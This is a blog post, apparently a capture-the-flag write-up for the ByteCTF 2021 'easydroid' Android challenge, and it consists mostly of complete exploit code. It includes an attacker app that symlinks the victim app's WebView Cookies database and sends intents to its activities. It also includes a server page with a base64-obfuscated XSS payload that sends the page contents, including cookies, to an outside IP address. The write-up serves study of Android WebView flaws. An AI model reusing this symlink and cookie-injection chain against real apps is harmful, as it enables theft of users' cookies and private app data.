ha1vk's blog
0%

bytectf2021_easydroid

发表于 分类于

url校验不充分,我们注册了ha1vktoutiao.com,并绑定了自己的服务器,实现了校验的绕过

TestActivity中的WebView允许执行JS,而Flag存储在Cookie数据库里

利用软连接创建一个symlink.html指向Cookies数据库,然后在加载我们自己的网页时注入一个XSS到Cookie中
MainActivity.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
package com.bytectf.pwneasydroid;
import android.annotation.SuppressLint;
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.os.Handler;
import android.util.Log;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import android.widget.EditText;
import android.widget.Toast;
import java.net.URISyntaxException;
public class MainActivity extends Activity {
    //EditText ed;
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        //ed = new EditText(this);
        //setContentView(ed);
        //launch("file://" + symlink());
        symlink();
        Intent i = new Intent();
        i.setClassName("com.bytectf.easydroid","com.bytectf.easydroid.MainActivity");
        i.setData(Uri.parse("http://www.ha1vktoutiao.com"));
        new Handler().postDelayed(() -> startActivity(i),5000);
    }
    private void launch(String url) {
        Uri uri = Uri.parse("http://192.3.81.102#toutiao.com/");
        Intent i = new Intent();
        i.setClassName("com.bytectf.easydroid","com.bytectf.easydroid.TestActivity");
        i.putExtra("url",url);
        i.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TASK);
        String url_str = i.toUri(Intent.URI_INTENT_SCHEME);
        //ed.setText(url_str);
    }
    private String symlink() {
        try {
            String root = getApplicationInfo().dataDir;
            String symlink = root + "/symlink.html";
            String cookies = "/data/data/com.bytectf.easydroid/app_webview/Cookies";
            Runtime.getRuntime().exec("rm " + symlink).waitFor();
            Runtime.getRuntime().exec("ln -s " + cookies + " " + symlink).waitFor();
            Runtime.getRuntime().exec("chmod -R 777 " + root).waitFor();
            return symlink;
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }
}

AndroidManifest.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.bytectf.pwneasydroid" >
    <uses-permission android:name="android.permission.INTERNET" />
    <application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:roundIcon="@mipmap/ic_launcher_round"
        android:usesCleartextTraffic="true"
        android:supportsRtl="true" >
        <activity
            android:name=".MainActivity"
            android:exported="true" >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>
</manifest>

服务器端的index.html

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>PWN</title>
<script>document.cookie = "x = '<img src=\"x\" onerror=\"eval(decodeURI(atob('bmV3JTIwSW1hZ2UoKS5zcmMlMjA9JTIwJTIyaHR0cDovLzE5Mi4zLjgxLjEwMi8/Y29va2llPSUyMiUyMCslMjB3aW5kb3cuYnRvYShlbmNvZGVVUkkoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJTIyaHRtbCUyMiklNUIwJTVELmlubmVySFRNTCkpOw==')))\">'"</script>
</head>
<body>
<script>
function getflag() {
   window.location = "intent:#Intent;launchFlags=0x10008000;component=com.bytectf.easydroid/.TestActivity;S.url=file%3A%2F%2F%2Fdata%2Fuser%2F0%2Fcom.bytectf.pwneasydroid%2Fsymlink.html;end";
}
setTimeout("getflag()",25000);
</script>
</body>
</html>